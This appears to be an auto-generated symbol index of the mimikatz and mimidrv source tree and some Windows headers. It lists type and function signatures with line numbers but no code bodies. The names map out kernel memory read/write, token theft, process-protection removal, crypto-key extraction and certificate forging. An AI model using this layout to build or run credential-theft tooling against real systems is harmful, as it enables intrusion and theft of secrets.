type CARD_AUTHENTICATE_RESPONSE (line 1477) | typedef struct _CARD_AUTHENTICATE_RESPONSE
type CARD_DATA (line 1709) | typedef struct _CARD_DATA
FILE: inc/fltUserStructures.h
type HANDLE (line 39) | typedef HANDLE HFILTER;
type HANDLE (line 40) | typedef HANDLE HFILTER_INSTANCE;
type HANDLE (line 41) | typedef HANDLE HFILTER_VOLUME;
type NTSTATUS (line 51) | typedef __success(return >= 0) LONG NTSTATUS;
type NTSTATUS (line 52) | typedef NTSTATUS *PNTSTATUS;
type FLT_FILESYSTEM_TYPE (line 60) | typedef enum _FLT_FILESYSTEM_TYPE {
type FILTER_INFORMATION_CLASS (line 107) | typedef enum _FILTER_INFORMATION_CLASS {
type FILTER_FULL_INFORMATION (line 120) | typedef struct _FILTER_FULL_INFORMATION {
type FILTER_AGGREGATE_BASIC_INFORMATION (line 143) | typedef struct _FILTER_AGGREGATE_BASIC_INFORMATION {
type FILTER_AGGREGATE_STANDARD_INFORMATION (line 199) | typedef struct _FILTER_AGGREGATE_STANDARD_INFORMATION {
type FILTER_VOLUME_INFORMATION_CLASS (line 271) | typedef enum _FILTER_VOLUME_INFORMATION_CLASS {
type FILTER_VOLUME_BASIC_INFORMATION (line 283) | typedef struct _FILTER_VOLUME_BASIC_INFORMATION {
type FILTER_VOLUME_STANDARD_INFORMATION (line 306) | typedef struct _FILTER_VOLUME_STANDARD_INFORMATION {
type INSTANCE_INFORMATION_CLASS (line 357) | typedef enum _INSTANCE_INFORMATION_CLASS {
type _INSTANCE_FULL_INFORMATION (line 393) | struct _INSTANCE_FULL_INFORMATION {
type INSTANCE_AGGREGATE_STANDARD_INFORMATION (line 418) | typedef struct _INSTANCE_AGGREGATE_STANDARD_INFORMATION {
type FILTER_MESSAGE_HEADER (line 545) | typedef struct _FILTER_MESSAGE_HEADER {
type FILTER_REPLY_HEADER (line 572) | typedef struct _FILTER_REPLY_HEADER {
FILE: inc/msasn1.h
type ASN1uint8_t (line 15) | typedef unsigned char ASN1uint8_t;
type ASN1int8_t (line 16) | typedef signed char ASN1int8_t;
type ASN1uint16_t (line 18) | typedef unsigned short ASN1uint16_t;
type ASN1int16_t (line 19) | typedef signed short ASN1int16_t;
type ASN1uint32_t (line 21) | typedef unsigned long ASN1uint32_t;
type ASN1int32_t (line 22) | typedef signed long ASN1int32_t;
type ASN1uint8_t (line 45) | typedef ASN1uint8_t ASN1octet_t;
type ASN1uint8_t (line 47) | typedef ASN1uint8_t ASN1bool_t;
type ASN1intx_t (line 49) | typedef struct tagASN1intx_t
type ASN1octetstring_t (line 58) | typedef struct tagASN1octetstring_t
type ASN1octetstring2_t (line 67) | typedef struct tagASN1octetstring2_t
type ASN1iterator_t (line 74) | typedef struct ASN1iterator_s
type ASN1bitstring_t (line 81) | typedef struct tagASN1bitstring_t
type ASN1char_t (line 90) | typedef char ASN1char_t;
type ASN1charstring_t (line 92) | typedef struct tagASN1charstring_t
type ASN1uint16_t (line 101) | typedef ASN1uint16_t ASN1char16_t;
type ASN1char16string_t (line 103) | typedef struct tagASN1char16string_t
type ASN1uint32_t (line 112) | typedef ASN1uint32_t ASN1char32_t;
type ASN1char32string_t (line 114) | typedef struct tagASN1char32string_t
type ASN1char_t (line 123) | typedef ASN1char_t *ASN1ztcharstring_t;
type ASN1char16_t (line 124) | typedef ASN1char16_t *ASN1ztchar16string_t;
type ASN1char32_t (line 125) | typedef ASN1char32_t *ASN1ztchar32string_t;
type ASN1wstring_t (line 127) | typedef struct tagASN1wstring_t
type ASN1objectidentifier_s (line 136) | struct ASN1objectidentifier_s
type ASN1objectidentifier2_t (line 143) | typedef struct tagASN1objectidentifier2_t
type ASN1encodedOID_t (line 151) | typedef struct tagASN1encodedOID_t
type ASN1ztcharstring_t (line 160) | typedef ASN1ztcharstring_t ASN1objectdescriptor_t;
type ASN1generalizedtime_t (line 162) | typedef struct tagASN1generalizedtime_t
type ASN1utctime_t (line 176) | typedef struct tagASN1utctime_t
type ASN1open_t (line 189) | typedef struct tagASN1open_t
type ASN1blocktype_e (line 204) | typedef enum tagASN1blocktype_e
type ASN1int32_t (line 210) | typedef ASN1int32_t ASN1enum_t;
type ASN1uint16_t (line 212) | typedef ASN1uint16_t ASN1choice_t;
type ASN1uint32_t (line 214) | typedef ASN1uint32_t ASN1magic_t;
type ASN1error_e (line 239) | typedef enum tagASN1error_e
type ASN1encodingrule_e (line 275) | typedef enum
type ASN1encoding_s (line 286) | struct ASN1encoding_s
type ASN1decoding_s (line 287) | struct ASN1decoding_s
type ASN1BerFunArr_t (line 292) | typedef struct tagASN1BerFunArr_t
type tagASN1module_t (line 302) | struct tagASN1module_t
type ASN1encoding_s (line 320) | struct ASN1encoding_s
type ASN1decoding_s (line 337) | struct ASN1decoding_s
type ASN1option_e (line 565) | typedef enum
type ASN1optionparam_t (line 588) | typedef struct tagASN1optionparam_t
FILE: inc/schannel.h
type eTlsSignatureAlgorithm (line 72) | enum eTlsSignatureAlgorithm
type eTlsHashAlgorithm (line 80) | enum eTlsHashAlgorithm
type SecPkgContext_RemoteCredentialInfo (line 129) | typedef struct _SecPkgContext_RemoteCredentialInfo
type SecPkgContext_RemoteCredentialInfo (line 138) | typedef SecPkgContext_RemoteCredentialInfo SecPkgContext_RemoteCredenita...
type SecPkgContext_LocalCredentialInfo (line 146) | typedef struct _SecPkgContext_LocalCredentialInfo
type SecPkgContext_LocalCredentialInfo (line 155) | typedef SecPkgContext_LocalCredentialInfo SecPkgContext_LocalCredenitalI...
type SecPkgCred_SupportedAlgs (line 162) | typedef struct _SecPkgCred_SupportedAlgs
type SecPkgCred_CipherStrengths (line 169) | typedef struct _SecPkgCred_CipherStrengths
type SecPkgCred_SupportedProtocols (line 176) | typedef struct _SecPkgCred_SupportedProtocols
type SecPkgCred_ClientCertPolicy (line 182) | typedef struct _SecPkgCred_ClientCertPolicy
type SecPkgContext_ClientCertPolicyResult (line 196) | typedef struct _SecPkgContext_ClientCertPolicyResult
type SecPkgContext_IssuerListInfoEx (line 203) | typedef struct _SecPkgContext_IssuerListInfoEx
type SecPkgContext_ConnectionInfo (line 210) | typedef struct _SecPkgContext_ConnectionInfo
type SecPkgContext_CipherInfo (line 224) | typedef struct _SecPkgContext_CipherInfo
type SecPkgContext_EapKeyBlock (line 246) | typedef struct _SecPkgContext_EapKeyBlock
type SecPkgContext_MappedCredAttr (line 253) | typedef struct _SecPkgContext_MappedCredAttr
type SecPkgContext_SessionInfo (line 263) | typedef struct _SecPkgContext_SessionInfo
type SecPkgContext_SessionAppData (line 271) | typedef struct _SecPkgContext_SessionAppData
type SecPkgContext_EapPrfInfo (line 278) | typedef struct _SecPkgContext_EapPrfInfo
type SecPkgContext_SupportedSignatures (line 286) | typedef struct _SecPkgContext_SupportedSignatures
type SecPkgContext_Certificates (line 327) | typedef struct _SecPkgContext_Certificates
type SecPkgContext_CertInfo (line 340) | typedef struct _SecPkgContext_CertInfo
type _HMAPPER (line 363) | struct _HMAPPER
type SCHANNEL_CRED (line 365) | typedef struct _SCHANNEL_CRED
type SCHANNEL_CERT_HASH (line 396) | typedef struct _SCHANNEL_CERT_HASH
type SCHANNEL_CERT_HASH_STORE (line 404) | typedef struct _SCHANNEL_CERT_HASH_STORE
type SCHANNEL_ALERT_TOKEN (line 540) | typedef struct _SCHANNEL_ALERT_TOKEN
type SCHANNEL_SESSION_TOKEN (line 583) | typedef struct _SCHANNEL_SESSION_TOKEN
type SCHANNEL_CLIENT_SIGNATURE (line 590) | typedef struct _SCHANNEL_CLIENT_SIGNATURE
type SSL_CREDENTIAL_CERTIFICATE (line 715) | typedef struct _SSL_CREDENTIAL_CERTIFICATE {
type _HMAPPER (line 735) | struct _HMAPPER
type SCH_CRED (line 736) | typedef struct _SCH_CRED
type SCH_CRED_SECRET_CAPI (line 749) | typedef struct _SCH_CRED_SECRET_CAPI
type SCH_CRED_SECRET_PRIVKEY (line 760) | typedef struct _SCH_CRED_SECRET_PRIVKEY
type SCH_CRED_PUBLIC_CERTCHAIN (line 773) | typedef struct _SCH_CRED_PUBLIC_CERTCHAIN
type PctPublicKey (line 782) | typedef struct _PctPublicKey
type X509Certificate (line 789) | typedef struct _X509Certificate {
FILE: inc/wincred.h
type SecHandle (line 49) | typedef struct _SecHandle
type PSecHandle (line 58) | typedef PSecHandle PCtxtHandle;
type FILETIME (line 69) | typedef struct _FILETIME
type _FILETIME (line 75) | struct _FILETIME
type _FILETIME (line 77) | struct _FILETIME
type LONG (line 86) | typedef LONG NTSTATUS, *PNTSTATUS;
type CREDENTIAL_ATTRIBUTEA (line 241) | typedef struct _CREDENTIAL_ATTRIBUTEA {
type CREDENTIAL_ATTRIBUTEW (line 248) | typedef struct _CREDENTIAL_ATTRIBUTEW {
type CREDENTIAL_ATTRIBUTEW (line 266) | typedef CREDENTIAL_ATTRIBUTEW CREDENTIAL_ATTRIBUTE;
type PCREDENTIAL_ATTRIBUTEW (line 267) | typedef PCREDENTIAL_ATTRIBUTEW PCREDENTIAL_ATTRIBUTE;
type CREDENTIAL_ATTRIBUTEA (line 269) | typedef CREDENTIAL_ATTRIBUTEA CREDENTIAL_ATTRIBUTE;
type PCREDENTIAL_ATTRIBUTEA (line 270) | typedef PCREDENTIAL_ATTRIBUTEA PCREDENTIAL_ATTRIBUTE;
type CREDENTIALA (line 422) | typedef struct _CREDENTIALA {
type CREDENTIALW (line 437) | typedef struct _CREDENTIALW {
type CREDENTIALW (line 481) | typedef CREDENTIALW CREDENTIAL;
type PCREDENTIALW (line 482) | typedef PCREDENTIALW PCREDENTIAL;
type CREDENTIALA (line 484) | typedef CREDENTIALA CREDENTIAL;
type PCREDENTIALA (line 485) | typedef PCREDENTIALA PCREDENTIAL;
type CREDENTIAL_TARGET_INFORMATIONA (line 505) | typedef struct _CREDENTIAL_TARGET_INFORMATIONA {
type CREDENTIAL_TARGET_INFORMATIONW (line 518) | typedef struct _CREDENTIAL_TARGET_INFORMATIONW {
type CREDENTIAL_TARGET_INFORMATIONW (line 548) | typedef CREDENTIAL_TARGET_INFORMATIONW CREDENTIAL_TARGET_INFORMATION;
type PCREDENTIAL_TARGET_INFORMATIONW (line 549) | typedef PCREDENTIAL_TARGET_INFORMATIONW PCREDENTIAL_TARGET_INFORMATION;
type CREDENTIAL_TARGET_INFORMATIONA (line 551) | typedef CREDENTIAL_TARGET_INFORMATIONA CREDENTIAL_TARGET_INFORMATION;
type PCREDENTIAL_TARGET_INFORMATIONA (line 552) | typedef PCREDENTIAL_TARGET_INFORMATIONA PCREDENTIAL_TARGET_INFORMATION;
type CERT_CREDENTIAL_INFO (line 564) | typedef struct _CERT_CREDENTIAL_INFO {
type USERNAME_TARGET_CREDENTIAL_INFO (line 576) | typedef struct _USERNAME_TARGET_CREDENTIAL_INFO {
type BINARY_BLOB_CREDENTIAL_INFO (line 584) | typedef struct _BINARY_BLOB_CREDENTIAL_INFO {
type CRED_MARSHAL_TYPE (line 593) | typedef enum _CRED_MARSHAL_TYPE {
type CRED_PROTECTION_TYPE (line 604) | typedef enum _CRED_PROTECTION_TYPE {
type CREDUI_INFOA (line 623) | typedef struct _CREDUI_INFOA
type CREDUI_INFOW (line 632) | typedef struct _CREDUI_INFOW
type CREDUI_INFOW (line 642) | typedef CREDUI_INFOW CREDUI_INFO;
type PCREDUI_INFOW (line 643) | typedef PCREDUI_INFOW PCREDUI_INFO;
type CREDUI_INFOA (line 645) | typedef CREDUI_INFOA CREDUI_INFO;
type PCREDUI_INFOA (line 646) | typedef PCREDUI_INFOA PCREDUI_INFO;
FILE: mimidrv/globals.h
type KIWI_BUFFER (line 24) | typedef struct _KIWI_BUFFER {
type KIWI_OS_INDEX (line 29) | typedef enum _KIWI_OS_INDEX {
FILE: mimidrv/ioctl.h
type PS_PROTECTION (line 38) | typedef struct _PS_PROTECTION {
type KIWI_PROCESS_SIGNATURE_PROTECTION (line 44) | typedef struct _KIWI_PROCESS_SIGNATURE_PROTECTION {
type MIMIDRV_PROCESS_PROTECT_INFORMATION (line 50) | typedef struct _MIMIDRV_PROCESS_PROTECT_INFORMATION {
type MIMIDRV_PROCESS_TOKEN_FROM_TO (line 55) | typedef struct _MIMIDRV_PROCESS_TOKEN_FROM_TO {
type PTHREAD_START_ROUTINE (line 61) | typedef PTHREAD_START_ROUTINE LPTHREAD_START_ROUTINE;
type MIMIDRV_THREAD_INFO (line 63) | typedef struct _MIMIDRV_THREAD_INFO {
type MIMIDRV_VARIABLE_NAME_AND_VALUE (line 68) | typedef struct _MIMIDRV_VARIABLE_NAME_AND_VALUE {
FILE: mimidrv/kkll_m_filters.c
function NTSTATUS (line 50) | NTSTATUS kkll_m_filters_list(PKIWI_BUFFER outBuffer)
function NTSTATUS (line 106) | NTSTATUS kkll_m_minifilters_list(PKIWI_BUFFER outBuffer)
FILE: mimidrv/kkll_m_filters.h
type KIWI_MF_INDEX (line 10) | typedef enum _KIWI_MF_INDEX {
FILE: mimidrv/kkll_m_memory.c
function NTSTATUS (line 8) | NTSTATUS kkll_m_memory_search(const PUCHAR adresseBase, const PUCHAR adr...
function NTSTATUS (line 17) | NTSTATUS kkll_m_memory_genericPointerSearch(PUCHAR *addressePointeur, co...
function PKKLL_M_MEMORY_GENERIC (line 35) | PKKLL_M_MEMORY_GENERIC kkll_m_memory_getGenericFromBuild(PKKLL_M_MEMORY_...
function NTSTATUS (line 44) | NTSTATUS kkll_m_memory_vm_read(PVOID Dest, PVOID From, DWORD Size)
function NTSTATUS (line 66) | NTSTATUS kkll_m_memory_vm_write(PVOID Dest, PVOID From, DWORD Size)
function NTSTATUS (line 88) | NTSTATUS kkll_m_memory_vm_alloc(DWORD Size, PVOID *Addr)
function NTSTATUS (line 101) | NTSTATUS kkll_m_memory_vm_free(PVOID Addr)
FILE: mimidrv/kkll_m_memory.h
type KKLL_M_MEMORY_PATTERN (line 9) | typedef struct _KKLL_M_MEMORY_PATTERN {
type KKLL_M_MEMORY_OFFSETS (line 14) | typedef struct _KKLL_M_MEMORY_OFFSETS {
type KKLL_M_MEMORY_GENERIC (line 27) | typedef struct _KKLL_M_MEMORY_GENERIC {
FILE: mimidrv/kkll_m_modules.c
function NTSTATUS (line 8) | NTSTATUS kkll_m_modules_enum(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BU...
function NTSTATUS (line 30) | NTSTATUS kkll_m_modules_list_callback(SIZE_T szBufferIn, PVOID bufferIn,...
function NTSTATUS (line 35) | NTSTATUS kkll_m_modules_fromAddr(PKIWI_BUFFER outBuffer, PVOID addr)
function NTSTATUS (line 46) | NTSTATUS kkll_m_modules_fromAddr_callback(SIZE_T szBufferIn, PVOID buffe...
function NTSTATUS (line 60) | NTSTATUS kkll_m_modules_first_callback(SIZE_T szBufferIn, PVOID bufferIn...
FILE: mimidrv/kkll_m_modules.h
type NTSTATUS (line 9) | typedef NTSTATUS (* PKKLL_M_MODULE_CALLBACK) (SIZE_T szBufferIn, PVOID b...
type KKLL_M_MODULE_FROM_ADDR (line 11) | typedef struct _KKLL_M_MODULE_FROM_ADDR {
type KKLL_M_MODULE_BASIC_INFOS (line 16) | typedef struct _KKLL_M_MODULE_BASIC_INFOS {
FILE: mimidrv/kkll_m_notify.c
function NTSTATUS (line 269) | NTSTATUS kkll_m_notify_list(PKIWI_BUFFER outBuffer, PKKLL_M_MEMORY_GENER...
function NTSTATUS (line 293) | NTSTATUS kkll_m_notify_search(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cb...
function NTSTATUS (line 322) | NTSTATUS kkll_m_notify_list_thread(PKIWI_BUFFER outBuffer)
function NTSTATUS (line 327) | NTSTATUS kkll_m_notify_list_process(PKIWI_BUFFER outBuffer)
function NTSTATUS (line 332) | NTSTATUS kkll_m_notify_list_image(PKIWI_BUFFER outBuffer)
function NTSTATUS (line 337) | NTSTATUS kkll_m_notify_list_reg(PKIWI_BUFFER outBuffer)
function NTSTATUS (line 384) | NTSTATUS kkll_m_notify_list_object(PKIWI_BUFFER outBuffer)
function NTSTATUS (line 426) | NTSTATUS kkll_m_notify_desc_object_callback(POBJECT_CALLBACK_ENTRY pCall...
FILE: mimidrv/kkll_m_notify.h
type KKLL_M_NOTIFY_CALLBACK (line 14) | typedef struct _KKLL_M_NOTIFY_CALLBACK {
type OBJECT_DIRECTORY_ENTRY (line 21) | typedef struct _OBJECT_DIRECTORY_ENTRY {
type OBJECT_DIRECTORY (line 26) | typedef struct _OBJECT_DIRECTORY {
type OBJECT_CALLBACK_ENTRY (line 31) | typedef struct _OBJECT_CALLBACK_ENTRY {
type NTSTATUS (line 42) | typedef NTSTATUS (* PPSSETCREATEPROCESSNOTIFYROUTINEEX) ( __in PCREATE_P...
FILE: mimidrv/kkll_m_process.c
function NTSTATUS (line 50) | NTSTATUS kkll_m_process_enum(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BU...
function NTSTATUS (line 65) | NTSTATUS kkll_m_process_list_callback(SIZE_T szBufferIn, PVOID bufferIn,...
function NTSTATUS (line 102) | NTSTATUS kkll_m_process_protect(SIZE_T szBufferIn, PVOID bufferIn, PKIWI...
function NTSTATUS (line 143) | NTSTATUS kkll_m_process_token(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_B...
function NTSTATUS (line 190) | NTSTATUS kkll_m_process_systoken_callback(SIZE_T szBufferIn, PVOID buffe...
function NTSTATUS (line 201) | NTSTATUS kkll_m_process_token_toProcess(SIZE_T szBufferIn, PVOID bufferI...
function NTSTATUS (line 241) | NTSTATUS kkll_m_process_fullprivileges(SIZE_T szBufferIn, PVOID bufferIn...
FILE: mimidrv/kkll_m_process.h
type KIWI_PROCESS_INDEX (line 9) | typedef enum _KIWI_PROCESS_INDEX {
type KIWI_NT6_PRIVILEGES (line 18) | typedef struct _KIWI_NT6_PRIVILEGES {
type NTSTATUS (line 27) | typedef NTSTATUS (* PKKLL_M_PROCESS_CALLBACK) (SIZE_T szBufferIn, PVOID ...
FILE: mimidrv/kkll_m_ssdt.c
function NTSTATUS (line 51) | NTSTATUS kkll_m_ssdt_getKeServiceDescriptorTable()
FILE: mimidrv/kkll_m_ssdt.h
type SERVICE_DESCRIPTOR_TABLE (line 11) | typedef struct _SERVICE_DESCRIPTOR_TABLE {
FILE: mimidrv/mimidrv.c
function NTSTATUS (line 11) | NTSTATUS UnSupported(PDEVICE_OBJECT DeviceObject, PIRP Irp)
function DriverUnload (line 16) | void DriverUnload(IN PDRIVER_OBJECT theDriverObject)
function NTSTATUS (line 22) | NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRI...
function NTSTATUS (line 48) | NTSTATUS kkll_m_sysenvset(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFE...
function NTSTATUS (line 61) | NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, I...
function KIWI_OS_INDEX (line 168) | KIWI_OS_INDEX getWindowsIndex()
FILE: mimikatz/mimikatz.c
function wmain (line 38) | int wmain(int argc, wchar_t * argv[])
function mimikatz_begin (line 69) | void mimikatz_begin()
function mimikatz_end (line 86) | void mimikatz_end(NTSTATUS status)
function BOOL (line 100) | BOOL WINAPI HandlerRoutine(DWORD dwCtrlType)
function NTSTATUS (line 106) | NTSTATUS mimikatz_initOrClean(BOOL Init)
function NTSTATUS (line 149) | NTSTATUS mimikatz_dispatchCommand(wchar_t * input)
function NTSTATUS (line 171) | NTSTATUS mimikatz_doLocal(wchar_t * input)
function wchar_t (line 241) | __declspec(dllexport) wchar_t * powershell_reflective_mimikatz(LPCWSTR i...
function mimikatz_dll (line 259) | void CALLBACK mimikatz_dll(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLin...
function FARPROC (line 283) | FARPROC WINAPI delayHookFailureFunc (unsigned int dliNotify, PDelayLoadI...
FILE: mimikatz/modules/crypto/kuhl_m_crypto_extractor.c
function kuhl_m_crypto_extractor_capi32 (line 8) | void kuhl_m_crypto_extractor_capi32(PKULL_M_MEMORY_ADDRESS address)
function kuhl_m_crypto_extractor_capi64 (line 144) | void kuhl_m_crypto_extractor_capi64(PKULL_M_MEMORY_ADDRESS address)
function kuhl_m_crypto_extractor_bcrypt32_bn (line 255) | void kuhl_m_crypto_extractor_bcrypt32_bn(PKIWI_BCRYPT_BIGNUM_Header bn)
function kuhl_m_crypto_extractor_bcrypt32_bn_ex (line 276) | void kuhl_m_crypto_extractor_bcrypt32_bn_ex(PVOID curBase, DWORD32 remBa...
function kuhl_m_crypto_extractor_bcrypt32_classic (line 291) | void kuhl_m_crypto_extractor_bcrypt32_classic(PKULL_M_MEMORY_HANDLE hMem...
function kuhl_m_crypto_extractor_bcrypt32 (line 308) | void kuhl_m_crypto_extractor_bcrypt32(PKULL_M_MEMORY_ADDRESS address)
function kuhl_m_crypto_extractor_bcrypt64_bn (line 438) | void kuhl_m_crypto_extractor_bcrypt64_bn(PKIWI_BCRYPT_BIGNUM_Header bn)
function kuhl_m_crypto_extractor_bcrypt64_bn_ex (line 459) | void kuhl_m_crypto_extractor_bcrypt64_bn_ex(PVOID curBase, DWORD64 remBa...
function kuhl_m_crypto_extractor_bcrypt64_classic (line 474) | void kuhl_m_crypto_extractor_bcrypt64_classic(PKULL_M_MEMORY_HANDLE hMem...
function kuhl_m_crypto_extractor_bcrypt64 (line 491) | void kuhl_m_crypto_extractor_bcrypt64(PKULL_M_MEMORY_ADDRESS address)
function DWORD (line 621) | DWORD kuhl_m_crypto_extractor_GetKeySizeForEncryptMemory(DWORD size)
function DWORD (line 630) | DWORD kuhl_m_crypto_extractor_GetKeySize(DWORD bits)
function BOOL (line 641) | BOOL CALLBACK kuhl_m_crypto_extract_MemoryAnalysis(PMEMORY_BASIC_INFORMA...
function BOOL (line 692) | BOOL CALLBACK kuhl_m_crypto_extract_exports_callback_module_exportedEntr...
function BOOL (line 725) | BOOL CALLBACK kuhl_m_crypto_extract_exports_callback_module_exportedEntr...
function BOOL (line 761) | BOOL CALLBACK kuhl_m_crypto_extract_MemoryAnalysisBCrypt(PMEMORY_BASIC_I...
function BOOL (line 816) | BOOL CALLBACK kuhl_m_crypto_extract_ProcessAnalysis(PSYSTEM_PROCESS_INFO...
function NTSTATUS (line 881) | NTSTATUS kuhl_m_crypto_extract(int argc, wchar_t * argv[])
FILE: mimikatz/modules/crypto/kuhl_m_crypto_extractor.h
type KIWI_CRYPTPROV (line 24) | typedef struct _KIWI_CRYPTPROV {
type KIWI_BCRYPT_GENERIC_KEY_HEADER (line 56) | typedef struct _KIWI_BCRYPT_GENERIC_KEY_HEADER {
type KIWI_BCRYPT_BIGNUM_Header (line 62) | typedef struct _KIWI_BCRYPT_BIGNUM_Header {
type KIWI_BCRYPT_BIGNUM_Div (line 69) | typedef struct _KIWI_BCRYPT_BIGNUM_Div {
type KIWI_PRIV_STRUCT_32 (line 78) | typedef struct _KIWI_PRIV_STRUCT_32 {
type KIWI_RAWKEY32 (line 89) | typedef struct _KIWI_RAWKEY32 {
type KIWI_RAWKEY_51_32 (line 114) | typedef struct _KIWI_RAWKEY_51_32 { // :(
type KIWI_UNK_INT_KEY32 (line 137) | typedef struct _KIWI_UNK_INT_KEY32 {
type KIWI_CRYPTKEY32 (line 142) | typedef struct _KIWI_CRYPTKEY32 {
type KIWI_BCRYPT_BIGNUM_Int32 (line 158) | typedef struct _KIWI_BCRYPT_BIGNUM_Int32 {
type KIWI_BCRYPT_BIGNUM_ComplexType32 (line 163) | typedef struct _KIWI_BCRYPT_BIGNUM_ComplexType32 {
type KIWI_BCRYPT_ASYM_KEY_DATA_10_32 (line 175) | typedef struct _KIWI_BCRYPT_ASYM_KEY_DATA_10_32 {
type KIWI_BCRYPT_ASYM_KEY_10_32 (line 210) | typedef struct _KIWI_BCRYPT_ASYM_KEY_10_32 {
type KIWI_BCRYPT_ASYM_KEY_Bignum_81_32 (line 218) | typedef struct _KIWI_BCRYPT_ASYM_KEY_Bignum_81_32 {
type KIWI_BCRYPT_ASYM_KEY_81_32 (line 238) | typedef struct _KIWI_BCRYPT_ASYM_KEY_81_32 {
type KIWI_BCRYPT_ASYM_KEY_Bignum_6_32 (line 261) | typedef struct _KIWI_BCRYPT_ASYM_KEY_Bignum_6_32 {
type KIWI_BCRYPT_ASYM_KEY_6_32 (line 280) | typedef struct _KIWI_BCRYPT_ASYM_KEY_6_32 {
type KIWI_BCRYPT_SYM_KEY_81_32 (line 303) | typedef struct _KIWI_BCRYPT_SYM_KEY_81_32 {
type KIWI_BCRYPT_SYM_KEY_80_32 (line 317) | typedef struct _KIWI_BCRYPT_SYM_KEY_80_32 {
type KIWI_BCRYPT_SYM_KEY_6_32 (line 330) | typedef struct _KIWI_BCRYPT_SYM_KEY_6_32 {
type KIWI_BCRYPT_HANDLE_KEY32 (line 341) | typedef struct _KIWI_BCRYPT_HANDLE_KEY32 {
type KIWI_PRIV_STRUCT_64 (line 351) | typedef struct _KIWI_PRIV_STRUCT_64 {
type KIWI_RAWKEY64 (line 362) | typedef struct _KIWI_RAWKEY64 {
type KIWI_UNK_INT_KEY64 (line 387) | typedef struct _KIWI_UNK_INT_KEY64 {
type KIWI_CRYPTKEY64 (line 392) | typedef struct _KIWI_CRYPTKEY64 {
type KIWI_BCRYPT_BIGNUM_Int64 (line 408) | typedef struct _KIWI_BCRYPT_BIGNUM_Int64 {
type KIWI_BCRYPT_BIGNUM_ComplexType64 (line 414) | typedef struct _KIWI_BCRYPT_BIGNUM_ComplexType64 {
type KIWI_BCRYPT_ASYM_KEY_DATA_10_64 (line 428) | typedef struct _KIWI_BCRYPT_ASYM_KEY_DATA_10_64 {
type KIWI_BCRYPT_ASYM_KEY_10_64 (line 463) | typedef struct _KIWI_BCRYPT_ASYM_KEY_10_64 {
type KIWI_BCRYPT_ASYM_KEY_Bignum_81_64 (line 471) | typedef struct _KIWI_BCRYPT_ASYM_KEY_Bignum_81_64 {
type KIWI_BCRYPT_ASYM_KEY_81_64 (line 491) | typedef struct _KIWI_BCRYPT_ASYM_KEY_81_64 {
type KIWI_BCRYPT_ASYM_KEY_Bignum_6_64 (line 514) | typedef struct _KIWI_BCRYPT_ASYM_KEY_Bignum_6_64 {
type KIWI_BCRYPT_ASYM_KEY_6_64 (line 533) | typedef struct _KIWI_BCRYPT_ASYM_KEY_6_64 {
type KIWI_BCRYPT_SYM_KEY_81_64 (line 556) | typedef struct _KIWI_BCRYPT_SYM_KEY_81_64 {
type KIWI_BCRYPT_SYM_KEY_80_64 (line 570) | typedef struct _KIWI_BCRYPT_SYM_KEY_80_64 {
type KIWI_BCRYPT_SYM_KEY_6_64 (line 583) | typedef struct _KIWI_BCRYPT_SYM_KEY_6_64 {
type KIWI_BCRYPT_HANDLE_KEY64 (line 594) | typedef struct _KIWI_BCRYPT_HANDLE_KEY64 {
type KIWI_CRYPT_SEARCH (line 611) | typedef struct _KIWI_CRYPT_SEARCH {
FILE: mimikatz/modules/crypto/kuhl_m_crypto_patch.c
function NTSTATUS (line 57) | NTSTATUS kuhl_m_crypto_p_capi(int argc, wchar_t * argv[])
function NTSTATUS (line 149) | NTSTATUS kuhl_m_crypto_p_cng(int argc, wchar_t * argv[])
FILE: mimikatz/modules/crypto/kuhl_m_crypto_pki.c
function BOOL (line 8) | BOOL kuhl_m_crypto_c_sc_auth_quickEncode(__in LPCSTR lpszStructType, __i...
function BOOL (line 28) | BOOL kuhl_m_crypto_c_sc_auth_Ext_AltUPN(PCERT_EXTENSION pCertExtension, ...
function BOOL (line 45) | BOOL kuhl_m_crypto_c_sc_auth_Ext_KU(PCERT_EXTENSION pCertExtension, BOOL...
function BOOL (line 53) | BOOL kuhl_m_crypto_c_sc_auth_Ext_EKU(PCERT_EXTENSION pCertExtension, DWO...
function kuhl_m_crypto_c_sc_auth_Ext_Free (line 73) | __inline void kuhl_m_crypto_c_sc_auth_Ext_Free(PCERT_EXTENSION pCertExte...
function BOOL (line 79) | BOOL giveski(PCERT_EXTENSION pCertExtension, PCERT_PUBLIC_KEY_INFO info)
function BOOL (line 92) | BOOL giveaki(PCERT_EXTENSION pCertExtension, PCERT_PUBLIC_KEY_INFO info)
function BOOL (line 105) | BOOL kuhl_m_crypto_c_sc_auth_Ext_CDP(PCERT_EXTENSION pCertExtension, DWO...
function BOOL (line 129) | BOOL givebc2(PCERT_EXTENSION pCertExtension, PCERT_BASIC_CONSTRAINTS2_IN...
function BOOL (line 136) | BOOL genRdnAttr(PCERT_RDN_ATTR attr, LPSTR oid, LPCWSTR name)
function PCERT_PUBLIC_KEY_INFO (line 150) | PCERT_PUBLIC_KEY_INFO getPublicKeyInfo(HCRYPTPROV_OR_NCRYPT_KEY_HANDLE h...
function BOOL (line 169) | BOOL makePin(HCRYPTPROV hProv, BOOL isHw, LPSTR pin)
function BOOL (line 185) | BOOL makeSN(LPCWCHAR szSn, PCRYPT_INTEGER_BLOB sn)
function BOOL (line 207) | BOOL getCertificate(HCRYPTPROV_OR_NCRYPT_KEY_HANDLE hProv, DWORD dwKeySp...
function PWSTR (line 225) | PWSTR kuhl_m_crypto_pki_getCertificateName(PCERT_NAME_BLOB blob)
function getDate (line 240) | void getDate(PFILETIME s, PFILETIME e, PVOID certOrCrlinfo, PCCERT_CONTE...
function BOOL (line 269) | BOOL closeHprov(BOOL bFreeKey, DWORD dwSpec, HCRYPTPROV_OR_NCRYPT_KEY_HA...
function BOOL (line 291) | BOOL getFromSigner(PCCERT_CONTEXT signer, PKIWI_SIGNER dSigner, HCRYPTPR...
function BOOL (line 343) | BOOL generateCrl(PKIWI_CRL_INFO ci, PCCERT_CONTEXT signer, PKIWI_SIGNER ...
function BOOL (line 390) | BOOL generateCertificate(PKIWI_KEY_INFO ki, PKIWI_CERT_INFO ci, PCCERT_C...
